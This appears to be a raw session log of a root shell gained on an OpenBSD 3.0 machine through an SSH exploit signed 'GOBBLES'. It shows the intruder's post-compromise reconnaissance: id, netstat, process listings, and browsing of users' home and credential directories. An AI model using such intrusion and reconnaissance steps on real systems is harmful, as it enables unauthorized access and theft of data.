SSH-1.99-OpenSSH_3.0
SSH-2.0-GOBBLES
*GOBBLE*
uname -a;id
OpenBSD pufferfish 3.0 GENERIC#94 i386
uid=0(root) gid=0(wheel) groups=0(wheel)
netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp        0      0  192.168.3.100.22       Hacker1.64864          ESTABLISHED
tcp        0      0  *.22                   *.*                    LISTEN
tcp        0      0  127.0.0.1.587          *.*                    LISTEN
tcp        0      0  127.0.0.1.25           *.*                    LISTEN
tcp        0      0  *.37                   *.*                    LISTEN
tcp        0      0  *.13                   *.*                    LISTEN
tcp        0      0  *.113                  *.*                    LISTEN
tcp        0      0  *.80                   *.*                    LISTEN
tcp        0      0  127.0.0.1.111          *.*                    LISTEN
tcp        0      0  *.111                  *.*                    LISTEN
udp        0      0  *.648                  *.*
udp        0      0  *.739                  *.*
udp        0      0  *.512                  *.*
udp        0      0  127.0.0.1.111          *.*
udp        0      0  *.514                  *.*
udp        0      0  *.111                  *.*
tcp6       0      0  *.22                   *.*                    LISTEN
tcp6       0      0  ::1.587                *.*                    LISTEN
tcp6       0      0  ::1.25                 *.*                    LISTEN
tcp6       0      0  *.37                   *.*                    LISTEN
tcp6       0      0  *.13                   *.*                    LISTEN
tcp6       0      0  *.113                  *.*                    LISTEN
udp6       0      0  *.512                  *.*
Active UNIX domain sockets
Address    Type   Recv-Q Send-Q Inode      Conn       Refs       Nextref    Addr
0xe0b0b700 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af4300
0xe0afc000 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af43c0
0xe0ae1f00 dgram       0      0 0x0        0xe0a97040 0x0        0xe0a58280
0xe0add800 dgram       0      0 0x0        0xe0a97040 0x0        0x0
0xe0ace500 dgram       0      0 0xefb43dd4 0x0        0xe0b09fc0 0x0        /dev/log
pwd
/
ls
.cshrc .profile altroot bin boot bsd dev etc home lost+found mnt root sbin stand sys tmp usr var
cd /home
ls
megla michael
cd megla
ls
.BitchX .Xauthority .bash_history .cshrc .login .mailrc .profile .rhosts .vnc
cd .BitchX
ls
cd ..
cd /root
ls
.bash_history .cshrc .klogin .login .profile .sh_history .ssh
cd /usr
ls
X11R6 bin games include lib libdata libexec lkm local mdec obj ports sbin share src
cd lib
ps -aux
USER       PID %CPU %MEM   VSZ   RSS TT   STAT STARTED       TIME COMMAND
root     23614  0.0  0.1   284   208 ??   R     2:57PM    0:00.00 ps -aux
root     25892  0.0  0.2   104   452 ??   Is   Tue02PM    0:00.14 syslogd
root     13304  0.0  0.1    64   364 ??   Is   Tue02PM    0:00.00 portmap
root     24196  0.0  0.6  1072  1544 ??   Ss   Tue02PM    0:00.59 /usr/sbin/htt
root     10597  0.0  0.2    80   472 ??   Is   Tue02PM    0:00.02 inetd
root       212  0.0  0.5   836  1328 ??   Ss   Tue02PM    0:01.27 sendmail: acc
www      25404  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.01 /usr/sbin/htt
www      29861  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.01 /usr/sbin/htt
www       1034  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
www      10944  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
www       2344  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
root     22389  0.0  0.4   332  1148 ??   Is   Tue02PM    0:00.53 /usr/sbin/ssh
root     11182  0.0  0.2   224   536 ??   Is   Tue02PM    0:00.31 cron
root     29118  0.0  0.2    44   428 C0   Is+  Tue02PM    0:00.00 /usr/libexec/
root     17521  0.0  0.2    44   428 C1   Is+  Tue02PM    0:00.00 /usr/libexec/
root       490  0.0  0.2    44   428 C2   Is+  Tue02PM    0:00.01 /usr/libexec/
root     17375  0.0  0.2    44   428 C3   Is+  Tue02PM    0:00.00 /usr/libexec/
root      4754  0.0  0.2    44   428 C5   Is+  Tue02PM    0:00.00 /usr/libexec/
megla    17905  0.0  0.4   452  1052 ??   Is    4:26PM    0:00.22 SCREEN (scree
megla    30640  0.0  0.5   828  1196 p1   Is+   4:26PM    0:00.04 /usr/bin/bash
megla    31648  0.0  0.5   828  1196 p2   Is+   4:26PM    0:00.05 /usr/bin/bash
root      1107  0.0  0.1   372   260 ??   S     2:50PM    0:00.22 //bin/sh
root     32216  0.0  0.1   372   260 ??   I     2:55PM    0:00.23 //bin/sh
root     26042  0.0  0.2   156   452 ??   D     2:57PM    0:00.53 find / -name
root         1  0.0  0.1   332   200 ??   Is   Tue02PM    0:00.02 /sbin/init
ps -aux
USER       PID %CPU %MEM   VSZ   RSS TT   STAT STARTED       TIME COMMAND
root      3408  0.0  0.1   284   208 ??   R     2:58PM    0:00.01 ps -aux
root     25892  0.0  0.2   104   452 ??   Is   Tue02PM    0:00.14 syslogd
root     13304  0.0  0.1    64   364 ??   Is   Tue02PM    0:00.00 portmap
root     24196  0.0  0.6  1072  1544 ??   Ss   Tue02PM    0:00.59 /usr/sbin/htt
root     10597  0.0  0.2    80   472 ??   Is   Tue02PM    0:00.02 inetd
root       212  0.0  0.5   836  1328 ??   Ss   Tue02PM    0:01.27 sendmail: acc
www      25404  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.01 /usr/sbin/htt
www      29861  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.01 /usr/sbin/htt
www       1034  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
www      10944  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
www       2344  0.0  0.6  1072  1548 ??   I    Tue02PM    0:00.00 /usr/sbin/htt
root     22389  0.0  0.4   332  1148 ??   Is   Tue02PM    0:00.53 /usr/sbin/ssh
root     11182  0.0  0.2   224   536 ??   Ss   Tue02PM    0:00.31 cron
root     29118  0.0  0.2    44   428 C0   Is+  Tue02PM    0:00.00 /usr/libexec/
root     17521  0.0  0.2    44   428 C1   Is+  Tue02PM    0:00.00 /usr/libexec/
root       490  0.0  0.2    44   428 C2   Is+  Tue02PM    0:00.01 /usr/libexec/
root     17375  0.0  0.2    44   428 C3   Is+  Tue02PM    0:00.00 /usr/libexec/
root      4754  0.0  0.2    44   428 C5   Is+  Tue02PM    0:00.00 /usr/libexec/
megla    17905  0.0  0.4   452  1052 ??   Is    4:26PM    0:00.22 SCREEN (scree
megla    30640  0.0  0.5   828  1196 p1   Is+   4:26PM    0:00.04 /usr/bin/bash
megla    31648  0.0  0.5   828  1196 p2   Is+   4:26PM    0:00.05 /usr/bin/bash
root      1107  0.0  0.1   372   260 ??   S     2:50PM    0:00.22 //bin/sh
root     32216  0.0  0.1   372   260 ??   I     2:55PM    0:00.23 //bin/sh
root     26042  0.0  0.2   156   452 ??   D     2:57PM    0:00.93 find / -name
root         1  0.0  0.1   332   200 ??   Is   Tue02PM    0:00.02 /sbin/init
cd /usr/libexec
ls
afsd atrun auth comsat cpp cvs fingerd ftp-proxy ftpd getNAME getty hprop hpropd identd
ipropd-master ipropd-slave kadmind kauthd kdc kerberos kfd kpasswdd kpropd ld.so lint1 lint2
locate.bigram locate.code locate.concatdb locate.mklocatedb locate.updatedb lockspool lpr
mail.local makekey makewhatis ntalkd rexecd rlogind rpc.rquotad rpc.rstatd rpc.rusersd
rpc.rwalld rpc.sprayd rshd safe_finger sendmail sftp-server sm.bin smrsh smtpd smtpfwdd
tcpd telnetd tftpd uucpd vfontedpr vi.recover
ls -l
total 4376
-r-xr-xr-x  1 root  bin     319488 Oct 18  2001 afsd
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 atrun
drwxr-x---  2 root  auth       512 Oct 18  2001 auth
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 comsat
-rwxr-xr-x  1 root  wheel    69632 Oct 18  2001 cpp
drwxr-xr-x  3 root  wheel      512 Oct 18  2001 cvs
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 fingerd
-r-xr-xr-x  1 root  bin      28672 Oct 18  2001 ftp-proxy
-r-xr-xr-x  1 root  bin      73728 Oct 18  2001 ftpd
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 getNAME
-r-xr-xr-x  1 root  bin      20480 Oct 18  2001 getty
-r-xr-xr-x  1 root  bin      61440 Oct 18  2001 hprop
-r-xr-xr-x  1 root  bin      57344 Oct 18  2001 hpropd
-r-xr-xr-x  1 root  bin      24576 Oct 18  2001 identd
-r-xr-xr-x  1 root  bin      77824 Oct 18  2001 ipropd-master
-r-xr-xr-x  1 root  bin      86016 Oct 18  2001 ipropd-slave
-r-xr-xr-x  1 root  bin     102400 Oct 18  2001 kadmind
-r-xr-xr-x  1 root  bin      20480 Oct 18  2001 kauthd
-r-xr-xr-x  1 root  bin      94208 Oct 18  2001 kdc
-r-xr-xr-x  1 root  bin      24576 Oct 18  2001 kerberos
-r-xr-xr-x  1 root  bin      24576 Oct 18  2001 kfd
-r-xr-xr-x  1 root  bin      77824 Oct 18  2001 kpasswdd
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 kpropd
-r-xr-xr-x  1 root  bin      61440 Oct 18  2001 ld.so
-r-xr-xr-x  1 root  bin     135168 Oct 18  2001 lint1
-r-xr-xr-x  1 root  bin      32768 Oct 18  2001 lint2
-r-xr-xr-x  1 root  bin       8192 Oct 18  2001 locate.bigram
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 locate.code
-r-xr-xr-x  1 root  bin       2405 Oct 18  2001 locate.concatdb
-r-xr-xr-x  1 root  bin       2618 Oct 18  2001 locate.mklocatedb
-r-xr-xr-x  1 root  bin       3790 Oct 18  2001 locate.updatedb
-r-sr-xr-x  1 root  bin      12288 Oct 18  2001 lockspool
drwxr-xr-x  2 root  wheel      512 Oct 18  2001 lpr
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 mail.local
-r-xr-xr-x  2 root  bin     184320 Oct 18  2001 makekey
-r-xr-xr-x  1 root  bin      14092 Oct 18  2001 makewhatis
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 ntalkd
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 rexecd
-r-xr-xr-x  1 root  bin      20480 Oct 18  2001 rlogind
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 rpc.rquotad
-r-xr-xr-x  1 root  bin      24576 Oct 18  2001 rpc.rstatd
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 rpc.rusersd
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 rpc.rwalld
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 rpc.sprayd
-r-xr-xr-x  1 root  bin      20480 Oct 18  2001 rshd
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 safe_finger
drwxr-xr-x  2 root  wheel      512 Oct 18  2001 sendmail
-r-xr-xr-x  1 root  bin      28672 Oct 18  2001 sftp-server
drwxr-xr-x  2 root  wheel      512 Oct 18  2001 sm.bin
-r-xr-xr-x  1 root  bin      53248 Oct 18  2001 smrsh
-r-x------  1 root  daemon   53248 Oct 18  2001 smtpd
-r-x------  1 root  daemon   24576 Oct 18  2001 smtpfwdd
-r-xr-xr-x  1 root  bin       8192 Oct 18  2001 tcpd
-r-xr-xr-x  1 root  bin      90112 Oct 18  2001 telnetd
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 tftpd
-r-xr-xr-x  1 root  bin      12288 Oct 18  2001 uucpd
-r-xr-xr-x  1 root  bin      16384 Oct 18  2001 vfontedpr
-r-xr-xr-x  1 root  bin       2952 Oct 18  2001 vi.recover